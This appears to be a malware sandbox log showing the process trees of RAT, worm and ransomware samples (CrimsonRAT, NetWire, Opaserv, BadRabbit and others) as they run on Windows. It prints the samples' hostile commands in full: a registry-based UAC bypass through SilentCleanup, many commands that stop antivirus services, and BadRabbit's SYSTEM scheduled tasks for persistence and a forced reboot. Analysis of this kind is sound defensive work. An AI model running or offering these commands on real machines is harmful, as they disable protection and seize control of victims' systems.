- Suspicious use of SetWindowsHookEx
PID:5740 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:3576
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"1⤵PID:3080
-
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"2⤵
- Executes dropped EXE
PID:940
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"1⤵
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\NetWire.exe"2⤵PID:2792
-
C:\Windows\SysWOW64\Notepad.exeC:\Windows\System32\Notepad.exe3⤵PID:7232
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "4⤵PID:5768
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- Modifies registry key
PID:6728
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "5⤵
- Modifies registry key
PID:692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I5⤵
- Abuse Elevation Control Mechanism: Bypass User Account Control
PID:7332
-
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- Modifies registry key
PID:7620
-
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵PID:5064
-
-
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"1⤵PID:6160
-
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7952 -
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC2⤵PID:8036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC3⤵PID:4848
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW2⤵PID:8076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW3⤵PID:6444
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC2⤵
- System Location Discovery: System Language Discovery
PID:8060 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC3⤵PID:6200
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD2⤵
- System Location Discovery: System Language Discovery
PID:8100 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD3⤵PID:6344
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS2⤵
- System Location Discovery: System Language Discovery
PID:8112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS3⤵
- System Location Discovery: System Language Discovery
PID:7036
-
-
-
C:\WINDOWS\system\msload.exeC:\WINDOWS\system\msload.exe2⤵PID:6620
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:7948
-
-
-
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:6776
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:7996
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:6812
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:8128
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:6868
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:8056
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:6904
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:7792
        C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:7628
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:7800
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:6392
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:3912
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:7368
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:5948
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:7532
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:2284
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:7476
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:1228

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"  PID:8016
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:5784
      - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:6952
          - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:3216
      - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:6744
    C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:5284
      - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:6164
          - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:5956
      - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:6792
          - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:4792
      - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:7072
    C:\WINDOWS\system\msload.exe  C:\WINDOWS\system\msload.exe  PID:6668
        C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:7004
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:7684
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:7052
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:8020
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:7068
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:7744
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:7104
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:8164
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:7140
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:8080
        C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:6356
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:4808
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:7116
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:2856
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:7244
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:7784
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:6928
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:7388
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:6948
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:2336
        C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:7400
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:7404
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:8064
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:6356
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:4640
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:7416
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:6972
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:7556
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:5488
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:228
        C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:6644
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:6328
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:6532
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:6560
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:6692
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:6496
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:7128
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:7444
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:3520
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:6460
        C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:4112
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:6928
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:5924
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:3940
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:7812
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:6392
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:7404
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:7916
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:6356
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:7244
        C:\Windows\SysWOW64\NET.exe  NET STOP NAVAPSVC  PID:7084
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP NAVAPSVC  PID:3080
        C:\Windows\SysWOW64\NET.exe  NET STOP PERSFW  PID:5040
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP PERSFW  PID:4724
        C:\Windows\SysWOW64\NET.exe  NET STOP AVPCC  PID:6636
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP AVPCC  PID:7120
        C:\Windows\SysWOW64\NET.exe  NET STOP MCSHIELD  PID:4372
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP MCSHIELD  PID:6008
        C:\Windows\SysWOW64\NET.exe  NET STOP SWEEPSRV.SYS  PID:6672
            C:\Windows\SysWOW64\net1.exe  C:\Windows\system32\net1 STOP SWEEPSRV.SYS  PID:8060

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"  PID:7232
    C:\Windows\SysWOW64\rundll32.exe  C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15  PID:7440
        C:\Windows\SysWOW64\cmd.exe  /c schtasks /Delete /F /TN rhaegal  PID:7752
            C:\Windows\SysWOW64\schtasks.exe  schtasks /Delete /F /TN rhaegal  PID:7976
        C:\Windows\SysWOW64\cmd.exe  /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 4095052998 && exit"  PID:5284
            C:\Windows\SysWOW64\schtasks.exe  schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 4095052998 && exit"  PID:7472
              - Scheduled Task/Job: Scheduled Task
        C:\Windows\SysWOW64\cmd.exe  /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:11:00  PID:7612
            C:\Windows\SysWOW64\schtasks.exe  schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:11:00  PID:7232
              - Scheduled Task/Job: Scheduled Task
        C:\Windows\7B26.tmp  "C:\Windows\7B26.tmp" \\.\pipe\{0DB19643-8ABE-4764-AC2E-1BA73B5E433C}  PID:6924

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Birele.exe  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Birele.exe"  PID:7044
    C:\Windows\SysWOW64\taskkill.exe  taskkill /F /IM explorer.exe  PID:7272
      - Kills process with taskkill